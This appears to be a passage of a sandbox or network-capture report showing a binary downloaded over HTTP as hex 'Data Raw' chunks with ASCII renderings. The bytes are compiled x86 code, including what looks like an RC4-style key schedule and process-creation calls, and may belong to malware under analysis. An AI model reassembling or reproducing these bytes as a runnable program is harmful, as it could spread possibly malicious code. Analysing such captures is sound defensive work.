                  2023-01-13 15:04:35 UTC415INData Raw: 00 56 ff 77 fc e8 37 04 fd ff 83 c4 0c 89 6c 24 04 89 1c 24 89 e6 6a 08 56 ff 77 fc e8 10 04 fd ff 83 c4 0c 6a 08 56 e8 d5 d3 ff ff 83 c4 08 83 7f e4 00 74 14 6a 61 68 ae 57 4f 00 68 34 80 4f 00 e8 ce 4f 04 00 83 c4 0c 8b 47 94 8b 4c 24 24 89 01 8b 47 98 89 41 04 8b 47 9c 89 41 08 8b 47 a0 89 41 0c 8b 4c 24 08 31 e1 e8 e2 57 03 00 83 c4 0c 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 83 c6 94 6a 78 56 e8 70 d3 ff ff 83 c4 08 56 e8 67 0c fd ff 83 c4 04 5e c3 cc cc 55 53 57 56 83 ec 68 8b 94 24 84 00 00 00 a1 34 00 50 00 31 e0 89 44 24 64 85 d2 0f 84 a1 03 00 00 8b bc 24 80 00 00 00 8b 5c 24 7c 8d 6b b0 89 6c 24 04 eb 15 90 90 90 90 90 90 90 90 90 90 90 01 f7 85 d2 0f 84 78 03 00 00 89 14 24 8b 45 40 be 40 00 00 00 29 c6 39 f2 0f 42 f2 01 e8
                  Data Ascii: Vw7l$$jVwjVtjahWOh4OOGL$$GAGAGAL$1W^_[]Vt$jxVpVg^USWVh$4P1D$d$\$|kl$x$E@@)9B
                  2023-01-13 15:04:35 UTC423INData Raw: 00 00 00 83 c0 08 89 46 04 6a 08 50 e8 b0 b4 ff ff 83 c4 08 83 3e 00 74 1f 31 c0 90 90 90 90 90 90 8b 4e 04 c7 04 81 00 00 00 00 83 c0 01 3b 06 72 ef eb 04 8b 74 24 08 89 f0 83 c4 18 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 53 57 56 83 ec 14 8b 74 24 28 ff 76 10 e8 1d ea fc ff 83 c4 04 89 c7 8b 46 10 83 78 0c 00 74 4a 6a 08 6a 08 6a 01 e8 b4 ec fc ff 83 c4 0c 89 c6 c7 00 02 00 00 00 83 c0 08 89 46 04 6a 08 50 e8 2b b4 ff ff 83 c4 08 83 3e 00 74 14 31 c0 90 8b 4e 04 c7 04 81 00 00 00 00 83 c0 01 3b 06 72 ef 89 f0 83 c4 14 5e 5f 5b 5d c3 85 d2 74 0f 80 3f 00 0f 88 f8 00 00 00 0f 84 e3 00 00 00 8d 42 03 c1 e8 02 bd 01 00 00 00 0f 45 e8 8d 1c ad 00 00 00 00 53 6a 08 6a 01 89 54 24 0c e8 3f ec fc ff 83 c4 0c 89 c6 89 28 83 c0 08 89 46 04
                  Data Ascii: FjP>t1N;rt$^_[]USWVt$(vFxtJjjjFjP+>t1N;r^_[]t?BESjjT$?(F
                  2023-01-13 15:04:35 UTC431INData Raw: ff 76 04 e8 79 95 ff ff 83 c4 08 6a 08 56 e8 6e 95 ff ff 83 c4 08 56 e8 65 ce fc ff 83 c4 04 89 f8 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 57 56 8b 74 24 0c 8b 3e 8b 07 c1 e0 02 50 ff 77 04 e8 3a 95 ff ff 83 c4 08 6a 08 57 e8 2f 95 ff ff 83 c4 08 57 e8 26 ce fc ff 83 c4 04 8b 7e 14 8b 07 c1 e0 02 50 ff 77 04 e8 12 95 ff ff 83 c4 08 6a 08 57 e8 07 95 ff ff 83 c4 08 57 e8 fe cd fc ff 83 c4 04 8b 7e 18 8b 07 c1 e0 02 50 ff 77 04 e8 ea 94 ff ff 83 c4 08 6a 08 57 e8 df 94 ff ff 83 c4 08 57 e8 d6 cd fc ff 83 c4 04 8b 7e 1c 8b 07 c1 e0 02 50 ff 77 04 e8 c2 94 ff ff 83 c4 08 6a 08 57 e8 b7 94 ff ff 83 c4 08 57 e8 ae cd fc ff 83 c4 04 8b 7e 10 8b 07 c1 e0 02 50 ff 77 04 e8 9a 94 ff ff 83 c4 08 6a 08 57 e8 8f 94 ff ff 83 c4 08 57 e8 86 cd fc ff 83 c4 04 8b
                  Data Ascii: vyjVnVe^_[]WVt$>Pw:jW/W&~PwjWW~PwjWW~PwjWW~PwjWW
                  2023-01-13 15:04:35 UTC438INData Raw: 24 04 31 ef 89 54 24 08 21 d0 21 f7 21 ee 8b 51 04 bd 00 00 00 00 39 5c 24 10 76 85 8b 2c 9a eb 80 8b 54 24 10 85 d2 8b 4c 24 28 0f 84 97 00 00 00 83 44 24 18 02 c7 04 24 00 00 00 00 31 c0 31 db eb 33 90 90 90 90 90 90 90 90 90 90 90 90 90 90 31 6c 24 14 31 c1 31 c0 03 74 24 04 0f 92 c0 01 d6 83 d0 00 89 34 9f 83 c3 01 8b 6c 24 24 8b 55 00 39 d3 73 52 89 54 24 10 89 44 24 04 8b 3c 24 89 da 33 54 24 18 89 d6 d1 ee 83 e2 01 31 c0 09 f2 0f 94 c0 09 f8 89 04 24 89 c6 f7 de b8 00 00 00 00 19 c0 89 ef 89 cd 8b 54 24 14 31 d5 21 c8 21 f5 21 d6 8b 7f 04 ba 00 00 00 00 39 5c 24 10 76 8e 8b 14 9f eb 89 8b 74 24 2c 56 6a 08 6a 01 e8 db ad fc ff 83 c4 0c 83 7c 24 3c 00 89 44 24 10 75 18 6a 48 68 24 32 4f 00 68 c0 15 4f 00 e8 5f f1 03 00 8b 44 24 1c 83 c4 0c 8b 4c 24
                  Data Ascii: $1T$!!!Q9\$v,T$L$(D$$1131l$11t$4l$$U9sRT$D$<$3T$1$T$1!!!9\$vt$,Vjj|$<D$ujHh$2OhO_D$L$
                  2023-01-13 15:04:35 UTC446INData Raw: 04 89 c6 89 e0 8d 4c 24 10 50 51 6a 00 6a 00 68 20 00 00 08 6a 01 6a 00 6a 00 56 6a 00 ff 15 58 d7 4f 00 56 e8 d8 8f fc ff 83 c4 04 8b 35 30 d7 4f 00 ff 34 24 ff d6 ff 74 24 04 ff d6 ff 74 24 70 ff d6 ff 74 24 68 ff d6 8b 44 24 60 85 c0 74 07 50 ff 15 30 d7 4f 00 6a 00 ff 74 24 68 ff 74 24 74 ff b4 24 80 00 00 00 57 e8 e2 f6 01 00 83 c4 14 31 f6 eb 4f 8b 35 30 d7 4f 00 ff 74 24 6c ff d6 ff 74 24 68 eb 1c 8b 35 30 d7 4f 00 ff 74 24 6c ff d6 ff 74 24 68 ff d6 ff 74 24 74 ff d6 ff 74 24 70 ff d6 ff 15 e8 d7 4f 00 50 e8 df ca fc ff 83 c4 04 50 68 9d 10 4e 00 e8 71 84 fc ff 83 c4 08 89 c6 8b 4c 24 78 31 e1 e8 81 da 02 00 89 f0 83 c4 7c 5e 5f c3 cc cc cc cc cc cc cc cc cc 55 53 57 56 8b 74 24 34 6a 0d 56 e8 a0 72 fc ff 83 c4 08 31 ff 83 f8 05 75 36 8b 6c 24 30
                  Data Ascii: L$PQjjh jjjVjXOV50O4$t$t$pt$hD$`tP0Ojt$ht$t$W1O50Ot$lt$h50Ot$lt$ht$tt$pOPPhNqL$x1|^_USWVt$4jVr1u6l$0
                  2023-01-13 15:04:35 UTC454INData Raw: 47 24 c7 47 b0 00 00 00 00 8b 8c 24 34 02 00 00 31 e1 e8 fa bb 02 00 81 c4 38 02 00 00 5e 5f 5b 5d c3 8b 40 18 ff 30 e8 35 c7 fc ff eb 8e 80 78 04 00 0f 85 06 f2 ff ff 83 7f 1c 00 74 48 ff 77 04 e8 0b c2 fd ff 83 c4 04 89 47 e8 c6 00 01 8b 47 e8 c6 40 01 00 68 12 24 4e 00 e8 01 c7 fc ff 83 c4 04 8b 4f e8 89 41 04 8b 47 c8 83 78 08 00 74 1e c7 45 3c ff ff ff ff eb 39 51 68 b0 44 4e 00 e9 71 ff ff ff 68 cf 49 4e 00 e9 27 ff ff ff 8b 45 38 8b 40 14 89 45 3c 68 02 08 4f 00 e8 be c6 fc ff 83 c4 04 6a 01 50 ff 75 38 e8 30 d1 fc ff 83 c4 0c 8b 45 38 8b 40 14 89 45 40 68 25 08 4f 00 e8 9a c6 fc ff 83 c4 04 6a 00 50 ff 75 38 e8 0c d1 fc ff 83 c4 0c e9 03 ef ff ff cc cc cc cc 53 57 56 8b 7c 24 10 8d 77 b0 ff 77 b4 e8 be 75 fc ff 83 c4 04 ff 77 b8 e8 b3 75 fc ff 83
                  Data Ascii: G$G$418^_[]@05xtHwGG@h$NOAGxtE<9QhDNqhIN'E8@E<hOjPu80E8@E@h%OjPu8SWV|$wwuwu
                  2023-01-13 15:04:35 UTC462INData Raw: e4 83 c8 01 6a 00 6a 01 50 e8 e3 50 fc ff 83 c4 0c 89 45 cc 6a 00 6a 01 ff 75 e4 e8 d1 50 fc ff 83 c4 0c 89 45 d0 31 c0 85 ff 74 67 90 90 90 90 90 8b 45 d4 8b 4d dc 83 c1 0c 39 c8 7d 3f 8d 4e 01 8d 50 01 0f b6 1e 8b 75 cc 89 55 d4 88 5c 30 f4 89 ce 83 c7 ff 75 d9 89 ce 31 ff eb 31 90 90 90 8d 4e 01 8d 58 01 29 d0 0f b6 16 8b 75 d0 89 5d d4 88 54 30 f4 89 ce 83 c7 ff 74 db 8b 45 d4 8b 55 dc 8b 4d e4 01 d1 83 c1 0c 39 c8 7c d2 31 c0 eb 02 31 ff 8b 55 dc 8b 4d e4 01 d1 83 c1 0c 39 4d d4 0f 8c b0 02 00 00 80 7d e8 00 74 13 8b 45 f8 8b 08 57 56 50 ff 51 08 83 c4 0c e9 97 02 00 00 8b 44 24 0c 80 38 42 75 15 0f b7 45 ba c1 e0 10 0f c8 89 44 24 14 8d 45 bc 8d 4d bd eb 0e 0f b7 45 ba 89 44 24 14 8d 4d bc 8d 45 bd 0f b6 09 89 4c 24 20 0f b6 18 83 7d f8 00 74 17 68
                  Data Ascii: jjPPEjjuPE1tgEM9}?NPuU\0u11NX)u]T0tEUM9|11UM9M}tEWVPQD$8BuED$EMED$MEL$ }th
                  2023-01-13 15:04:35 UTC470INData Raw: 08 89 46 1c c7 46 18 00 00 00 00 c7 46 20 00 00 00 00 c7 46 24 00 00 00 00 c7 46 28 00 00 00 00 53 56 e8 6a ae 01 00 83 c4 08 eb 76 b8 70 17 00 00 03 46 08 89 46 18 89 f1 83 c1 1c 6a 00 6a 00 6a 00 53 51 50 ff 76 04 e8 14 80 fd ff 83 c4 1c 89 46 14 50 e8 98 0d fc ff 83 c4 04 85 c0 74 49 ff 76 04 68 c3 51 4e 00 e8 04 27 fc ff 83 c4 08 8b 4c 24 1c 89 01 ff 76 14 e8 e3 fc fb ff 83 c4 04 ff 76 04 e8 b8 31 fc ff 83 c4 04 ff 76 10 e8 ad 31 fc ff 83 c4 04 56 e8 a4 31 fc ff 83 c4 04 31 f6 89 f0 5e 5f 5b 5d c3 80 3e 00 0f 85 16 ff ff ff ff 76 14 e8 47 f8 fb ff 83 c4 04 84 c0 74 66 ff 76 08 6a 00 e8 06 0e fc ff 83 c4 08 89 c7 50 e8 1b 0d fc ff 83 c4 04 85 c0 75 41 8b 1d 9c 4b 4d 00 57 e8 b8 fc fb ff 83 c4 04 53 6a 00 6a 00 6a 00 6a 00 6a 00 50 e8 b4 fc fb ff 83 c4
                  Data Ascii: FFF F$F(SVjvpFFjjjSQPvFPtIvhQN'L$vv1v1V11^_[]>vGtfvjPuAKMWSjjjjjP
                  2023-01-13 15:04:35 UTC477INData Raw: c7 44 24 14 0c 00 00 00 c7 44 24 1c 01 00 00 00 89 74 24 18 8d 4c 24 14 e9 b0 00 00 00 e8 6f 18 fc ff 89 c5 83 c0 0c 89 44 24 08 8d 7c 24 20 eb 06 89 d6 85 f6 75 56 6a 00 8d 44 24 14 50 68 00 04 00 00 57 53 ff 15 d8 d8 4f 00 85 c0 0f 84 3f fe ff ff ff 74 24 10 57 ff 74 24 10 e8 d0 09 fc ff 83 c4 0c 8b 45 08 31 f6 83 f8 04 72 c5 8b 4d 04 8b 09 0f c9 ba ff ff ff ff 81 f9 00 00 04 00 77 af 83 c1 04 89 ca 39 c8 73 a6 eb a6 83 fe ff 0f 84 fc fd ff ff 55 e8 85 18 fc ff 83 c4 04 8b bc 24 3c 04 00 00 89 07 8b 84 24 40 04 00 00 89 30 89 c6 31 ed c7 44 24 04 00 00 00 00 e9 4f fe ff ff 56 ff 15 b0 d8 4f 00 31 f6 31 c9 57 68 00 00 04 00 6a 00 6a 04 51 6a ff ff 15 44 d7 4f 00 89 c3 83 c0 01 83 f8 01 77 12 57 e8 11 12 fc ff 83 c4 04 8b 5c 24 04 e9 de 00 00 00 89 74 24
                  Data Ascii: D$D$t$L$oD$|$ uVjD$PhWSO?t$Wt$E1rMw9sU$<$@01D$OVO11WhjjQjDOwW\$t$
                  2023-01-13 15:04:35 UTC485INData Raw: 8b 50 04 8b 48 08 01 ce 89 f0 d3 e3 09 d3 8b 34 24 89 5e 04 89 46 08 83 f8 08 7c 2e 90 90 90 90 90 8b 06 83 c0 0c 0f b6 cb 51 50 e8 41 eb fb ff 83 c4 08 8b 5e 04 8b 46 08 c1 eb 08 89 5e 04 8d 48 f8 89 4e 08 83 f8 0f 7f d7 2b 6c 24 0c 89 6c 24 04 be ff ff ff ff ba 1e 00 00 00 8b 4c 24 28 eb 0f 89 fa 90 90 90 90 90 90 90 90 90 90 90 90 90 89 d0 29 f0 83 f8 01 7f 1f 68 22 02 00 00 68 20 55 4f 00 68 4e 6f 4f 00 89 d7 e8 44 36 03 00 89 fa 8b 4c 24 34 83 c4 0c 8d 04 16 89 c7 c1 ef 1f 01 c7 d1 ff 8d 2c 7f 8b 1c ad 14 56 4d 00 39 cb 7f af 89 fe 39 0c ad 18 56 4d 00 7c b3 8b 34 24 8b 46 08 83 f8 1c 7c 1a 68 61 01 00 00 68 20 55 4f 00 68 b2 6e 4f 00 e8 f7 35 03 00 83 c4 0c 8b 46 08 0f bf 0c ad 10 56 4d 00 0f b6 14 cd b4 53 4d 00 89 c1 d3 e2 0b 56 04 8d 48 05 89 56
                  Data Ascii: PH4$^F|.QPA^F^HN+l$l$L$()h"h UOhNoOD6L$4,VM99VM|4$F|hah UOhnO5FVMSMVHV
                  2023-01-13 15:04:35 UTC493INData Raw: 0c 56 e8 9a da fb ff 83 c4 04 89 c6 8b 4c 24 10 31 e1 e8 ba 1f 02 00 89 f0 83 c4 14 5e 5f 5b c3 cc 57 56 8b 7c 24 0c 6a 00 6a 04 6a 04 e8 bf d3 fb ff 83 c4 0c 89 c6 c7 00 00 00 00 00 c7 40 04 00 00 00 00 c7 40 08 00 00 00 00 c7 40 0c 00 00 00 00 57 e8 19 fd ff ff 83 c4 04 89 06 89 f0 5e 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 53 57 56 8b 7c 24 14 6a 00 6a 02 ff 77 14 e8 4c ea fe ff 83 c4 0c 89 c6 6a 00 6a 02 ff 77 18 e8 3b ea fe ff 83 c4 0c 85 f0 0f 84 24 01 00 00 ff 77 18 ff 77 14 e8 75 f4 fe ff 83 c4 08 89 c6 ff 77 08 50 e8 87 ea fe ff 83 c4 08 89 fd 89 c7 56 e8 aa cc fe ff 83 c4 04 ff 75 14 e8 cf d3 fe ff 83 c4 04 89 c6 6a 00 6a 01 50 50 e8 af db fe ff 83 c4 10 56 ff 75 10 ff 75 0c e8 50 04 ff ff 83 c4 0c 89 c3 56 e8 75 cc fe ff 83 c4 04
                  Data Ascii: VL$1^_[WV|$jjj@@@W^_USWV|$jjwLjjw;$wwuwPVujjPPVuuPVu
                  2023-01-13 15:04:35 UTC501INData Raw: 5c 24 08 0f ad df 89 de d3 ee f6 c1 20 0f 44 f7 8b 3c 24 0f a4 f8 02 01 f6 83 e6 02 84 c9 0f b6 8a f5 5b 4d 00 0f 48 f5 8d 3c be 8b 74 24 04 0f ad de d3 eb f6 c1 20 0f 44 de 83 e3 01 84 c9 0f 48 dd 09 fb 89 de 83 c2 02 75 a6 31 c9 90 90 90 90 89 4c 24 04 8a 0c 8d 34 5c 4d 00 0f a5 f0 d3 e6 f6 c1 20 0f 45 c6 b9 00 00 00 00 0f 45 f1 89 c1 c1 e9 1c 89 f2 c1 ea 1c 09 c8 09 d6 25 ff ff ff 0f 81 e6 ff ff ff 0f ba e0 ff ff ff 31 db 31 ff 89 34 24 90 90 90 90 90 90 90 90 90 90 90 90 90 0f b6 8a 14 5c 4d 00 89 f5 0f ad c5 89 c6 d3 ee f6 c1 20 0f 44 f5 0f a4 df 02 01 f6 83 e6 02 84 c9 0f b6 8a 15 5c 4d 00 bd 00 00 00 00 0f 48 f5 8d 34 9e 8b 2c 24 0f ad c5 89 c3 d3 eb f6 c1 20 0f 44 dd 31 ed 83 e3 01 84 c9 0f 48 dd 09 f3 8b 34 24 83 c2 02 75 a9 8b 54 24 0c c1 e2 07
                  Data Ascii: \$ D<$[MH<t$ DHu1L$4\M EE%114$\M D\MH4,$ D1H4$uT$
                  2023-01-13 15:04:35 UTC509INData Raw: 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 44 24 04 8b 4c 24 08 8b 09 ff 71 60 ff 70 60 e8 5b 12 03 00 83 c4 08 c3 cc cc cc cc cc cc cc 53 57 56 8b 5c 24 14 8b 44 24 10 68 10 fb 47 00 ff 33 ff 30 e8 57 b4 fb ff 83 c4 0c 85 c0 74 35 89 c7 e8 d9 9a fb ff 89 c6 83 c0 0c 8b 0b 50 53 ff 51 1c 83 c4 08 8b 4e 08 8b 47 04 3b 48 08 75 18 51 ff 30 ff 36 e8 32 f2 01 00 83 c4 0c 85 c0 0f 94 c3 eb 06 31 db eb 0b 31 db 56 e8 5f 9b fb ff 83 c4 04 89 d8 5e 5f 5b c3 cc cc cc cc cc cc 8b 44 24 04 68 10 fb 47 00 ff 74 24 0c ff 30 e8 ec b3 fb ff 83 c4 0c 85 c0 0f 95 c0 c3 cc cc cc 8b 44 24 04 ff 30 e8 b5 a6 fb ff 83 c4 04 85 c0 0f 9f c0 c3 cc cc cc cc cc cc cc cc cc cc cc cc 53 57 56 83 ec 08 8b 44 24 18 8b 0d 34 00 50 00 31 e1 89 4c 24 04 89 e1 6a 0a 51 50 e8 e1
                  Data Ascii: [D$L$q`p`[SWV\$D$hG30Wt5PSQNG;HuQ06211V_^_[D$hGt$0D$0SWVD$4P1L$jQP
                  2023-01-13 15:04:35 UTC517INData Raw: 83 c4 04 ff 34 24 e8 66 32 fe ff 83 c4 04 68 f5 4b 4e 00 e9 f3 ea ff ff ff b5 3c 01 00 00 e8 5e e1 ff ff 83 c4 04 84 c0 0f 85 1d eb ff ff 83 7d 6c 00 0f 84 f0 01 00 00 c6 85 5f 02 00 00 01 e9 07 eb ff ff ff b5 d8 01 00 00 ff b5 3c 01 00 00 e8 9c e0 ff ff 83 c4 08 84 c0 74 5f 56 e8 5f 76 fb ff 83 c4 04 e9 e1 ea ff ff e8 82 7b fb ff 89 c6 83 c0 0c 8b 8d d8 01 00 00 8b 11 50 51 ff 52 1c 83 c4 08 8b 85 d0 01 00 00 ff 70 08 ff 70 04 ff 76 08 ff 76 04 e8 e6 77 fb ff 83 c4 10 89 c3 56 e8 0b 7c fb ff 83 c4 04 84 db 0f 85 9a ea ff ff 68 3f 5a 4e 00 e9 81 f4 ff ff 68 24 b4 4e 00 e8 2c 6b fb ff 83 c4 04 50 ff b5 78 03 00 00 e8 1d 35 fa ff 83 c4 08 56 68 47 13 4e 00 e8 0f 6b fb ff 83 c4 08 50 ff b5 78 03 00 00 e8 00 35 fa ff 83 c4 08 56 e8 c7 75 fb ff 83 c4 04 68 97
                  Data Ascii: 4$f2hKN<^}l_<t_V_v{PQRppvvwV|h?ZNh$N,kPx5VhGNkPx5Vuh
                  2023-01-13 15:04:35 UTC524INData Raw: c4 18 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc 55 53 57 56 83 ec 78 89 d7 89 ce 8b ac 24 90 00 00 00 a1 34 00 50 00 31 e0 89 44 24 74 8b 42 04 50 ff 10 83 c4 04 89 c3 85 c0 74 09 8b 03 53 ff 50 04 83 c4 04 55 ff b4 24 90 00 00 00 ff 73 04 e8 5b 4e fb ff 83 c4 0c 8b 03 8d 6c 24 02 55 53 ff 50 0c 83 c4 08 8b 03 53 ff 50 10 83 c4 04 8b 47 04 ff 70 14 55 e8 b5 52 fe ff 83 c4 08 89 c7 50 e8 7a 58 fe ff 83 c4 04 89 c3 ff 76 20 e8 6d 58 fe ff 83 c4 04 31 c9 29 c3 0f 48 d9 53 57 e8 dc 78 fe ff 83 c4 08 89 c6 57 e8 c1 4f fe ff 83 c4 04 8b 4c 24 74 31 e1 e8 13 a2 01 00 89 f0 83 c4 78 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc 55 53 57 56 83 ec 10 89 d3 89 ce a1 34 00 50 00 31 e0 89 44 24 0c 89 cd 80 7c 24 28 00 75 0d e8 bc 5b fb ff 89 04 24 89 c5 83 c5 0c 53 e8
                  Data Ascii: ^_[]USWVx$4P1D$tBPtSPU$s[Nl$USPSPGpURPzXv mX1)HSWxWOL$t1x^_[]USWV4P1D$|$(u[$S
                  2023-01-13 15:04:35 UTC532INData Raw: 01 c0 50 57 e8 38 ff fd ff 83 c4 08 57 e8 2f 38 fb ff 83 c4 04 8b 06 8b 76 18 01 c0 50 56 e8 1e ff fd ff 83 c4 08 56 e8 15 38 fb ff 83 c4 04 5e 5f e9 0b 38 fb ff cc cc cc cc cc cc cc cc cc cc cc 55 53 57 56 83 ec 08 8b 5c 24 20 89 d8 c1 e0 04 8d 2c 03 81 c5 80 00 00 00 8d b4 03 a0 00 00 00 68 b0 89 42 00 55 e8 e5 a2 fe ff 83 c4 08 56 50 e8 ab 2f fe ff 83 c4 08 89 c6 85 db 74 21 31 ff 83 c5 ff 55 56 e8 46 38 fe ff 83 c4 08 83 c0 01 8b 4c 24 1c 66 89 04 79 83 c7 01 39 fb 75 e1 55 56 e8 9a 5c fe ff 83 c4 08 6a 40 e8 10 2f fe ff 83 c4 04 89 04 24 85 db 74 57 8b 7c 24 24 90 90 89 5c 24 04 0f b7 c3 50 56 56 e8 11 36 fe ff 83 c4 0c 55 56 89 f3 8b 74 24 08 56 e8 f0 3f fe ff 83 c4 0c 55 53 e8 56 5c fe ff 83 c4 08 56 89 de 8b 5c 24 08 e8 07 38 fe ff 83 c4 04 29 f8
                  Data Ascii: PW8W/8vPVV8^_8USWV\$ ,hBUVP/t!1UVF8L$fy9uUV\j@/$tW|$$\$PVV6UVt$V?USV\V\$8)
                  2023-01-13 15:04:35 UTC540INData Raw: 8b 07 8b 70 30 81 fe 01 01 00 00 72 14 6a 28 68 d6 3c 4f 00 68 5e 6d 4f 00 e8 f6 5b 02 00 83 c4 0c 8b 9c 24 28 01 00 00 66 c7 87 fc fe ff ff 00 00 31 c9 90 90 90 90 90 90 90 90 90 90 90 90 90 90 88 8c 0f fe fe ff ff 89 c8 31 d2 f7 f6 0f b6 04 13 88 44 0c 0c 8d 41 01 88 84 0f ff fe ff ff 31 d2 f7 f6 0f b6 04 13 88 44 0c 0d 83 c1 02 81 f9 00 01 00 00 75 ca 31 c9 31 c0 90 90 90 90 90 90 0f b6 94 07 fe fe ff ff 01 d1 89 d6 0f b6 54 04 0c 01 ca 0f b6 ca 0f b6 9c 0f fe fe ff ff 88 9c 07 fe fe ff ff 89 f3 88 9c 0f fe fe ff ff 0f b6 9c 07 ff fe ff ff 01 da 0f b6 4c 04 0d 01 d1 0f b6 c9 0f b6 94 0f fe fe ff ff 88 94 07 ff fe ff ff 88 9c 0f fe fe ff ff 83 c0 02 3d 00 01 00 00 75 9e 6a 00 6a 01 68 00 06 00 00 e8 80 17 fb ff 83 c4 0c 68 00 06 00 00 6a 00 89 44 24 0c
                  Data Ascii: p0rj(h<Oh^mO[$(f11DA1Du11TL=ujjhhjD$
                  2023-01-13 15:04:35 UTC548INData Raw: 01 00 89 f0 83 c4 08 5e 5f 5b 5d c3 cc cc cc cc cc 55 53 57 56 83 ec 5c 8b 4c 24 74 8b 5c 24 70 a1 34 00 50 00 31 e0 89 44 24 58 8b 6b 68 ff 71 10 e8 4b f6 fa ff 83 c4 04 89 d6 8d 7c 24 2c 89 d9 89 c2 57 56 e8 67 1b 00 00 83 c4 08 85 c0 0f 84 a0 04 00 00 89 44 24 24 e8 93 fe fa ff 89 44 24 1c 8b 4c 24 2c 8b 41 04 89 4c 24 20 8b 49 08 89 44 24 44 89 4c 24 4c c7 44 24 48 00 00 00 00 c7 44 24 50 00 00 00 00 8d 44 24 44 89 44 24 54 50 e8 eb f5 fa ff 83 c4 04 8b 55 04 85 d2 89 6c 24 14 74 71 8b 45 00 89 04 24 8d 4a ff 89 d0 83 e0 03 83 f9 03 89 54 24 0c 73 63 31 db 31 c9 85 c0 74 20 8b 14 24 8d 0c 8a 31 d2 90 90 90 90 90 90 8b 34 91 83 c6 01 39 f3 0f 42 de 83 c2 01 39 d0 75 ee 85 db 89 5c 24 08 0f 84 86 00 00 00 6a 08 53 6a 00 e8 78 f8 fa ff 83 c4 0c 89 c6 8d
                  Data Ascii: ^_[]USWV\L$t\$p4P1D$XkhqK|$,WVgD$$D$L$,AL$ ID$DL$LD$HD$PD$DD$TPUl$tqE$JT$sc11t $149B9u\$jSjx
                  2023-01-13 15:04:35 UTC556INData Raw: 8b 74 8d 04 83 c7 01 39 fb 0f 43 fb 83 c6 01 39 f7 72 02 89 fe 8b 7c 8d 08 83 c7 01 39 fe 72 02 89 f7 8b 5c 8d 0c 83 c3 01 39 df 72 c4 89 fb eb c0 53 57 56 83 ec 18 89 d6 89 cf a1 34 00 50 00 31 e0 89 44 24 14 8b 41 48 8b 40 68 ff 70 18 ff 72 08 e8 6a d3 fa ff 83 c4 08 8b 07 ff 70 08 ff 70 04 ff 76 08 e8 07 d3 fa ff 83 c4 0c e8 3f df fa ff 89 c3 83 c0 0c 8b 4f 44 8b 11 50 51 ff 52 1c 83 c4 08 8b 43 04 8b 4b 08 89 04 24 89 4c 24 08 c7 44 24 04 00 00 00 00 c7 44 24 0c 00 00 00 00 89 e0 89 44 24 10 50 e8 94 d6 fa ff 83 c4 04 8b 44 24 10 8b 48 04 8b 50 08 29 ca 03 08 52 51 ff 76 08 e8 e9 d0 fa ff 83 c4 0c 53 e8 a0 df fa ff 83 c4 04 ff 77 0c ff 77 08 ff 76 08 e8 3f d2 fa ff 83 c4 0c ff 77 10 ff 76 08 e8 f1 d1 fa ff 83 c4 08 8b 47 14 ff 70 08 ff 70 04 ff 76 08
                  Data Ascii: t9C9r|9r\9rSWV4P1D$AH@hprjppv?ODPQRCK$L$D$D$D$PD$HP)RQvSwwv?wvGppv
                  2023-01-13 15:04:35 UTC563INData Raw: 24 8b 74 c1 08 89 f5 c1 ed 1f 0f af eb 8d 14 36 89 d8 f7 e2 01 ea 01 f3 8b 34 24 13 7c f1 0c 01 c3 11 d7 89 5c f1 08 89 7c f1 0c 8b 44 24 18 33 7c 01 0c 33 5c 01 08 89 fd 0f a4 dd 10 0f a4 fb 10 89 5c 01 0c 89 6c 01 08 8b 44 24 04 8b 74 c1 08 89 f7 c1 ef 1f 0f af fd 8d 14 36 89 e8 f7 e2 01 fa 01 f5 8b 74 24 04 13 5c f1 0c 01 c5 11 d3 89 6c f1 08 89 5c f1 0c 8b 54 24 0c 33 5c d1 0c 33 6c d1 08 89 e8 0f a4 d8 01 0f ac dd 1f 89 6c d1 0c 89 44 d1 08 8b 29 89 ee c1 ee 1f 8b 5c 24 10 8b 7c 19 08 89 e8 01 e8 f7 e7 0f af f7 01 f2 01 fd 8b 79 04 13 7c 19 0c 01 c5 11 d7 89 29 89 79 04 8b 44 24 18 33 7c 01 0c 33 6c 01 08 89 6c 01 0c 89 7c 01 08 8b 44 24 04 8b 34 c1 8d 14 36 89 f8 f7 e2 89 f3 c1 eb 1f 0f af df 01 da 01 f7 8b 74 24 04 13 6c f1 04 01 c7 11 d5 89 3c f1
                  Data Ascii: $t64$|\|D$3|3\\lD$t6t$\l\T$3\3llD)\$|y|)yD$3|3ll|D$46t$l<
                  2023-01-13 15:04:35 UTC571INData Raw: 56 ff 50 04 83 c4 04 8b 4c 24 08 31 e1 e8 3f e7 00 00 83 c4 0c 5e 5f 5b 5d c3 cc cc cc cc cc cc cc 55 53 57 56 50 8b 5c 24 28 8b 74 24 24 0f b6 6c 24 30 6a 00 68 50 20 00 00 6a 01 e8 30 9b fa ff 83 c4 0c 89 c7 05 4c 20 00 00 89 04 24 c7 87 4c 20 00 00 70 84 4d 00 89 b7 40 20 00 00 89 9f 44 20 00 00 8b 44 24 2c 89 87 48 20 00 00 c7 87 3c 20 00 00 00 00 00 00 c7 47 18 00 00 00 00 8d 47 1c 50 e8 59 f2 fa ff 83 c4 04 8d 47 30 50 e8 8d f2 ff ff 83 c4 04 8b 44 24 1c 89 47 04 55 57 68 10 f6 48 00 50 e8 a6 64 fd ff 83 c4 10 89 47 10 8b 44 24 18 89 07 55 57 68 c0 f6 48 00 50 e8 6d 67 fd ff 83 c4 10 89 47 0c 8b 44 24 20 89 47 08 85 c0 74 13 55 57 68 30 f7 48 00 50 e8 6f 64 fd ff 83 c4 10 89 47 14 66 c7 87 38 20 00 00 00 00 57 68 70 f7 48 00 e8 b5 61 f9 ff 83 c4 08
                  Data Ascii: VPL$1?^_[]USWVP\$(t$$l$0jhP j0L $L pM@ D D$,H < GGPYG0PD$GUWhHPdGD$UWhHPmgGD$ GtUWh0HPodGf8 WhpHa
